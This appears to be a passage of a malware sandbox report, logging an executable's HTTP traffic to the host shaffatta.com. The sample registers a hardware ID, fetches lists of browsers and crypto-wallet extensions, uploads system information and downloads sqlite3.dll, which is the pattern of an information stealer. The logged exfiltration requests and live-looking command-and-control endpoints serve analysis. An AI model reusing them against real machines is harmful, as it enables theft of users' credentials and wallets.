                                                                                                    2024-05-03 09:21:24 UTC216OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 43 46 49 4a 44 41 41 4b 45 42 47 43 47 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 35 44 32 35 42 37 38 45 30 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 46 49 4a 44 41 41 4b 45 42 47 43 47 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 49 6e 73 74 61 6c 6c 5f 32 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 46 49 4a 44 41 41 4b 45 42 47 43 47 48 49 45 2d 2d 0d 0a
                                                                                                    Data Ascii: ------CFIECFIJDAAKEBGCGHIEContent-Disposition: form-data; name="hwid"E5D25B78E0D72284582127------CFIECFIJDAAKEBGCGHIEContent-Disposition: form-data; name="build"Install_2------CFIECFIJDAAKEBGCGHIE--
                                                                                                    2024-05-03 09:21:24 UTC206INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:24 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 156
                                                                                                    Connection: close
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Served-By: shaffatta.com
                                                                                                    2024-05-03 09:21:24 UTC156INData Raw: 4f 44 63 33 5a 54 46 68 59 6d 49 30 4e 7a 4d 77 59 54 42 6a 4d 32 49 78 5a 6a 51 79 59 32 4e 68 59 6a 59 33 5a 44 64 68 4d 6d 46 6c 4d 44 59 78 5a 47 52 6d 4d 6a 51 33 4e 44 67 33 59 6a 4d 35 4e 57 55 79 4d 7a 49 33 4d 6a 67 31 4f 54 4d 78 5a 44 64 6b 4d 54 41 34 4d 47 51 30 4d 7a 41 32 66 47 70 69 5a 48 52 68 61 57 70 76 64 6d 64 38 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 3d
                                                                                                    Data Ascii: ODc3ZTFhYmI0NzMwYTBjM2IxZjQyY2NhYjY3ZDdhMmFlMDYxZGRmMjQ3NDg3YjM5NWUyMzI3Mjg1OTMxZDdkMTA4MGQ0MzA2fGpiZHRhaWpvdmd8ZWltZWhydnpvZC5maWxlfDB8MHwxfDF8MXwxfDF8MXw=


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.449738168.119.248.464436936C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-05-03 09:21:25 UTC200OUTPOST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----GDBKKFHIEGDHJKECAAKK
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 268
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:25 UTC268OUTData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4b 46 48 49 45 47 44
                                                                                                    Data Ascii: ------GDBKKFHIEGDHJKECAAKKContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------GDBKKFHIEGDHJKECAAKKContent-Disposition: form-data; name="message"browsers------GDBKKFHIEGD
                                                                                                    2024-05-03 09:21:25 UTC207INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:25 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 1520
                                                                                                    Connection: close
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Served-By: shaffatta.com
                                                                                                    2024-05-03 09:21:25 UTC1520INData Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52
                                                                                                    Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIER


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    2192.168.2.449739168.119.248.464436936C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-05-03 09:21:26 UTC200OUTPOST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----BFHDAEHDAKECGCAKFCFI
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 267
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:26 UTC267OUTData Raw: 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43
                                                                                                    Data Ascii: ------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="message"plugins------BFHDAEHDAKEC
                                                                                                    2024-05-03 09:21:26 UTC207INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:26 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 5416
                                                                                                    Connection: close
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Served-By: shaffatta.com
                                                                                                    2024-05-03 09:21:26 UTC5416INData Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42
                                                                                                    Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    3192.168.2.449740168.119.248.464436936C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-05-03 09:21:27 UTC201OUTPOST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----CBKJEGCBKKJECBGCGDBA
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 6691
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:27 UTC6691OUTData Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 45 47 43 42 4b 4b 4a 45 43 42 47 43 47 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 45 47 43 42 4b 4b 4a 45 43 42 47 43 47 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 6c 7a 64 47 56 74 58 32 6c 75 5a 6d 38 75 64 48 68 30 0d 0a 2d 2d 2d
                                                                                                    Data Ascii: ------CBKJEGCBKKJECBGCGDBAContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------CBKJEGCBKKJECBGCGDBAContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZm8udHh0---
                                                                                                    2024-05-03 09:21:27 UTC181INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:27 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 0
                                                                                                    Connection: close
                                                                                                    X-Served-By: shaffatta.com


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    4192.168.2.449741168.119.248.464436936C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-05-03 09:21:28 UTC92OUTGET /d32e011d2eaa85a0/sqlite3.dll HTTP/1.1
                                                                                                    Host: shaffatta.com
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:28 UTC288INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:28 GMT
                                                                                                    Content-Type: application/x-msdos-program
                                                                                                    Content-Length: 1106998
                                                                                                    Connection: close
                                                                                                    Last-Modified: Mon, 05 Sep 2022 12:30:30 GMT
                                                                                                    ETag: "10e436-5e7ed3ec64580"
                                                                                                    Accept-Ranges: bytes
                                                                                                    X-Served-By: shaffatta.com
                                                                                                    2024-05-03 09:21:28 UTC16096INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00
                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *
                                                                                                    2024-05-03 09:21:28 UTC16384INData Raw: ff ff ff 45 e4 eb dd 83 c4 1c 5b 5e 5f 5d c3 55 89 e5 57 56 53 89 d6 89 c3 83 ec 1c 89 4d e0 85 db 0f 84 80 00 00 00 85 f6 8b 43 04 78 09 a8 01 74 12 3b 73 24 75 0d 83 e0 fc 85 f6 78 03 83 c8 02 89 43 04 8a 03 3c a7 75 14 39 73 1c 75 43 83 7d e0 00 75 3d 81 63 04 ff ff df ff eb 34 3c ac 75 30 83 7b 14 00 74 2a c7 45 e4 00 00 00 00 8b 43 14 8b 4d e4 3b 08 7d 19 6b 55 e4 14 8b 4d e0 89 d7 89 f2 8b 44 38 08 e8 82 ff ff ff ff 45 e4 eb dd 8b 43 0c 8b 4d e0 89 f2 e8 70 ff ff ff 8b 5b 10 e9 78 ff ff ff 83 c4 1c 5b 5e 5f 5d c3 55 89 e5 57 56 53 8d 59 08 89 d6 83 ec 2c 89 45 e0 89 4d dc c7 45 e4 00 00 00 00 8b 45 dc 8b 55 e4 3b 10 7d 5a 8b 45 e4 3b 45 08 75 08 ff 45 e4 83 c3 48 eb e6 f6 43 28 40 8b 43 2c 74 07 83 7c 86 04 00 75 10 8b 7d e0 8b 57 28 8d 4a 01 89 4f
                                                                                                    Data Ascii: E[^_]UWVSMCxt;s$uxC<u9suC}u=c4<u0{t*ECM;}kUMD8ECMp[x[^_]UWVSY,EMEEU;}ZE;EuEHC(@C,t|u}W(JO
                                                                                                    2024-05-03 09:21:28 UTC16384INData Raw: c4 0c 31 c0 5b 5e 5f 5d c3 55 89 e5 8b 45 08 5d 8b 40 0c c3 55 89 e5 53 8b 45 08 8b 58 34 8b 48 30 8b 45 0c 89 08 89 58 04 31 c0 5b 5d c3 55 b8 9a 71 eb 61 89 e5 5d c3 55 89 e5 8b 45 08 c7 80 38 01 00 00 01 00 00 00 5d c3 55 31 c0 89 e5 57 56 53 8d 75 d8 83 ec 3c 8b 5d 0c 8b 55 10 c7 45 d4 00 00 00 00 c7 45 d0 00 00 00 00 89 d7 89 d9 89 55 c8 f3 aa 89 5d cc 89 34 24 ff 15 20 62 eb 61 50 8d 45 c8 89 f2 b9 10 00 00 00 e8 cc 97 ff ff ff 15 90 61 eb 61 89 45 d8 8d 45 c8 89 f2 b9 04 00 00 00 e8 b4 97 ff ff ff 15 50 62 eb 61 89 45 d8 8d 45 c8 89 f2 b9 04 00 00 00 e8 9c 97 ff ff 89 34 24 ff 15 28 63 eb 61 8d 45 c8 52 b9 08 00 00 00 89 f2 e8 83 97 ff ff 39 5d d4 89 d8 0f 4e 45 d4 8d 65 f4 5b 5e 5f 5d c3 55 89 e5 57 56 53 89 cb 83 ec 1c 89 55 e0 8b 51 04 89 45 e4
                                                                                                    Data Ascii: 1[^_]UE]@USEX4H0EX1[]Uqa]UE8]U1WVSu<]UEEU]4$ baPEaaEEPbaEE4$(caER9]NEe[^_]UWVSUQE
                                                                                                    2024-05-03 09:21:28 UTC16384INData Raw: 07 04 85 c0 74 05 e8 66 ff ff ff 43 eb d0 83 c4 1c 5b 5e 5f 5d c3 83 b8 a0 00 00 00 00 55 89 e5 74 03 5d eb a1 5d c3 55 89 e5 85 c0 74 09 80 60 01 fb 8b 40 18 eb f3 5d c3 8b 10 85 d2 74 1a 55 89 e5 53 89 c3 8d 42 fc 51 89 03 e8 c2 fa ff ff c7 03 00 00 00 00 5b 5b 5d c3 8b 50 10 f6 c2 24 74 06 8b 50 04 8b 00 c3 f6 c2 08 74 12 55 89 e5 83 ec 08 dd 00 dd 1c 24 e8 ff 6a ff ff c9 c3 80 e2 12 74 0b 83 78 08 00 74 05 e9 44 6b ff ff 31 c0 31 d2 c3 55 89 e5 53 52 89 c3 e8 ba ff ff ff 89 03 8b 43 10 89 53 04 66 25 40 f2 83 c8 04 66 89 43 10 31 c0 59 5b 5d c3 55 89 e5 8b 45 08 e8 96 ff ff ff 5d c3 55 89 e5 8b 45 08 5d eb 8b 8b 50 04 39 10 7e 17 55 89 e5 53 8d 5a 01 8b 48 08 89 58 04 5b 5d 8b 04 91 e9 6d ff ff ff 31 c0 31 d2 c3 55 89 e5 57 56 53 31 f6 83 ec 0c 8b 7a
                                                                                                    Data Ascii: tfC[^_]Ut]]Ut`@]tUSBQ[[]P$tPtU$jtxtDk11USRCSf%@fC1Y[]UE]UE]P9~USZHX[]m11UWVS1z
                                                                                                    2024-05-03 09:21:28 UTC16384INData Raw: 5d c4 89 de 76 ed 8b 7d 08 83 3f 00 74 07 31 d2 e8 ae fe ff ff 83 f8 7f 77 0b 88 45 c8 8d 4d c9 e9 80 00 00 00 3d ff 07 00 00 89 c2 77 17 c1 ea 06 83 e0 3f 8d 4d ca 83 ea 40 83 c0 80 88 55 c8 88 45 c9 eb 60 3d ff ff 00 00 77 25 c1 ea 0c 8d 4d cb 83 ea 20 88 55 c8 89 c2 83 e0 3f c1 ea 06 83 c0 80 83 e2 3f 88 45 ca 83 c2 80 88 55 c9 eb 34 c1 ea 12 8d 4d cc 83 e2 07 83 ea 10 88 55 c8 89 c2 c1 ea 0c 83 e2 3f 83 c2 80 88 55 c9 89 c2 83 e0 3f c1 ea 06 83 c0 80 83 e2 3f 88 45 cb 83 c2 80 88 55 ca 0f b6 03 8d 7b 01 3d bf 00 00 00 76 57 0f b6 80 40 9e ec 61 3b 7d c4 75 0b 83 f8 7f 0f 86 2d 02 00 00 eb 17 8a 17 88 d3 83 e3 c0 80 fb 80 75 e9 c1 e0 06 83 e2 3f 47 01 d0 eb d9 89 c2 81 e2 00 f8 ff ff 81 fa 00 d8 00 00 0f 84 00 02 00 00 89 c2 83 e2 fe 81 fa fe ff 00 00
                                                                                                    Data Ascii: ]v}?t1wEM=w?M@UE`=w%M U??EU4MU?U??EU{=vW@a;}u-u?G
                                                                                                    2024-05-03 09:21:29 UTC16384INData Raw: 2c c7 44 24 14 00 00 00 00 c7 44 24 10 00 00 00 00 c7 44 24 0c ff ff ff ff 89 44 24 08 c7 44 24 04 00 00 00 00 c7 04 24 e9 fd 00 00 ff 15 1c 63 eb 61 83 ec 18 85 c0 74 4c 89 c6 8d 04 00 31 d2 e8 91 ff ff ff 85 c0 89 c3 74 3a 89 74 24 14 89 44 24 10 c7 44 24 0c ff ff ff ff 89 7c 24 08 c7 44 24 04 00 00 00 00 c7 04 24 e9 fd 00 00 ff 15 1c 63 eb 61 83 ec 18 85 c0 89 da 75 0a 89 1c 24 e8 9e 64 ff ff 31 d2 8d 65 f4 89 d0 5b 5e 5f 5d c3 55 89 e5 57 56 53 89 c7 83 ec 2c c7 44 24 1c 00 00 00 00 c7 44 24 18 00 00 00 00 c7 44 24 14 00 00 00 00 c7 44 24 10 00 00 00 00 c7 44 24 0c ff ff ff ff 89 44 24 08 c7 44 24 04 00 00 00 00 c7 04 24 e9 fd 00 00 ff 15 94 63 eb 61 83 ec 20 85 c0 74 58 99 89 c6 e8 ea fe ff ff 85 c0 89 c3 74 4a c7 44 24 1c 00 00 00 00 c7 44 24 18 00
                                                                                                    Data Ascii: ,D$D$D$D$D$$catL1t:t$D$D$|$D$$cau$d1e[^_]UWVS,D$D$D$D$D$D$D$$ca tXtJD$D$
                                                                                                    2024-05-03 09:21:29 UTC16384INData Raw: 3c e8 71 2d ff ff 85 f6 c7 43 3c 00 00 00 00 c7 43 30 00 00 00 00 75 59 80 7b 0f 00 8b bb e4 00 00 00 75 20 80 7b 0c 00 74 1a 83 7d cc 00 74 1d 8b 43 40 83 38 00 74 15 89 f8 e8 3d 9e fe ff 83 f8 18 7e 09 89 f8 e8 af 3a ff ff eb 16 8b 07 85 c0 74 0a 66 83 60 1c f3 8b 40 20 eb f2 8b 47 04 89 47 08 8b 53 1c 8b 83 e4 00 00 00 e8 f8 01 ff ff 8b bb e8 00 00 00 85 ff 74 25 80 7f 2c 00 74 3a b9 01 00 00 00 31 d2 89 f8 e8 c5 3e ff ff c6 47 2c 00 c7 47 68 00 00 00 00 c6 47 2f 00 eb 1b 85 f6 75 17 83 7d cc 00 74 11 8b 53 1c 39 53 24 76 09 89 d8 e8 a8 00 ff ff 89 c6 85 f6 75 22 83 7d cc 00 74 1c 8b 43 40 31 c9 ba 16 00 00 00 e8 be 8b fe ff 89 c6 83 f8 0c b8 00 00 00 00 0f 44 f0 80 7b 04 00 74 04 31 c0 eb 4d 8b bb e8 00 00 00 85 ff 75 0e ba 01 00 00 00 89 d8 e8 8e 9f
                                                                                                    Data Ascii: <q-C<C0uY{u {t}tC@8t=~:tf`@ GGSt%,t:1>G,GhG/u}tS9S$vu"}tC@1D{t1Mu
                                                                                                    2024-05-03 09:21:29 UTC16384INData Raw: 66 c7 47 08 01 00 8b 45 e4 e8 ea 72 fe ff 89 07 8b 45 e0 8d 57 0c 89 5f 04 b9 09 00 00 00 66 89 47 0a 31 c0 89 d7 f3 ab 83 c4 2c 89 f0 5b 5e 5f 5d c3 55 89 e5 57 56 53 89 c3 89 d0 83 ec 1c 89 55 e4 e8 b1 72 fe ff 85 c0 88 4b 08 74 38 3a 08 89 c6 74 13 8b 55 e4 83 c4 1c 89 d8 5b 5e 5f 5d 31 c9 e9 05 ff ff ff 8b 50 0c 0f b6 f9 89 d8 89 f9 e8 bc ff ff ff 8b 56 10 83 c4 1c 89 f9 89 d8 5b 5e 5f 5d eb ac 83 c4 1c 5b 5e 5f 5d c3 f6 41 1c 08 0f 84 b6 00 00 00 55 89 e5 57 56 53 89 c7 83 ec 1c 8b 00 f6 40 18 04 75 37 8b 77 74 89 d3 85 f6 0f 44 f7 c1 e3 04 03 58 10 8b 5b 0c 8b 5b 48 85 db 74 13 f6 43 1c 80 75 0d 80 7b 2b 01 74 07 66 83 7b 22 02 74 0e ff 47 24 c7 47 0c 0b 02 00 00 31 c0 eb 60 8b 5e 70 85 db 74 09 3b 4b 04 74 51 8b 1b eb f3 89 4d e0 89 55 e4 31 c9 ba
                                                                                                    Data Ascii: fGErEW_fG1,[^_]UWVSUrKt8:tU[^_]1PV[^_][^_]AUWVS@u7wtDX[[HtCu{+tf{"tG$G1`^pt;KtQMU1
                                                                                                    2024-05-03 09:21:29 UTC16384INData Raw: 06 e8 94 c2 ff ff 85 c0 74 27 8b 57 2c 8b 4d e4 89 50 1c 8b 57 10 81 48 04 00 00 20 00 66 89 48 20 89 c1 89 50 2c 8b 13 89 f0 e8 60 ff ff ff 89 03 83 c4 2c 5b 5e 5f 5d c3 55 89 e5 57 56 53 89 d7 83 ec 2c 0f b7 19 8b 75 08 8b 12 66 85 db 74 0a 85 d2 74 14 39 1a 7c 0b eb 21 85 d2 bb 01 00 00 00 74 0a 8b 1a 43 eb 05 bb 01 00 00 00 66 89 19 89 f1 e8 17 ff ff ff 89 07 eb 2d 4b 89 4d e0 89 55 e4 6b db 14 8b 5c 1a 08 89 5c 24 04 8b 00 89 04 24 e8 16 5c ff ff 8b 4d e0 8b 55 e4 0f b7 01 48 6b c0 14 89 74 02 08 83 c4 2c 5b 5e 5f 5d c3 55 89 e5 57 56 53 89 ce 83 ec 2c 8b b8 ec 00 00 00 8b 08 85 ff 0f 84 8a 00 00 00 80 b8 d0 00 00 00 01 89 c3 74 7f 0f b6 81 b0 00 00 00 c1 e0 04 03 41 10 8b 40 04 8b 40 04 f6 40 18 01 75 66 89 d1 8b 57 10 89 d8 46 e8 92 fe ff ff 83 7b
                                                                                                    Data Ascii: t'W,MPWH fH P,`,[^_]UWVS,uftt9|!tCf-KMUk\\$$\MUHkt,[^_]UWVS,tA@@@ufWF{
                                                                                                    2024-05-03 09:21:29 UTC16384INData Raw: 1c 83 79 04 00 8b 38 74 48 80 bf b1 00 00 00 00 89 d3 89 c6 74 12 c7 44 24 04 58 7a eb 61 89 04 24 e8 b0 5e ff ff eb 24 8b 45 08 89 08 89 f8 e8 83 6d ff ff 85 c0 79 25 89 5c 24 08 c7 44 24 04 69 7a eb 61 89 34 24 e8 8a 5e ff ff 83 c8 ff eb 0c 8b 5d 08 0f b6 87 b0 00 00 00 89 13 83 c4 1c 5b 5e 5f 5d c3 55 89 e5 57 56 53 89 d3 89 cf 83 ec 2c 8b 52 2c 8b 30 8d 0c 95 08 00 00 00 83 c2 03 3b 96 80 00 00 00 7c 1c 8b 13 c7 44 24 04 7d 7a eb 61 89 04 24 89 4d e4 89 54 24 08 e8 34 5e ff ff 8b 4d e4 8b 53 30 89 0c 24 89 f0 c7 44 24 04 00 00 00 00 e8 84 88 ff ff 85 c0 75 0e 89 7c 24 04 89 34 24 e8 36 65 fe ff eb 17 8b 53 2c 8d 4a 01 89 4b 2c 89 3c 90 c7 44 90 04 00 00 00 00 89 43 30 83 c4 2c 5b 5e 5f 5d c3 8b 90 fc 00 00 00 85 d2 74 3d 83 b8 ec 00 00 00 00 74 34 55
                                                                                                    Data Ascii: y8tHtD$Xza$^$Emy%\$D$iza4$^][^_]UWVS,R,0;|D$}za$MT$4^MS0$D$u|$4$6eS,JK,<DC0,[^_]t=t4U


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    5192.168.2.449742168.119.248.464436936C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-05-03 09:21:30 UTC201OUTPOST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----CAAAAFBKFIECAAKECGCA
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 4599
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
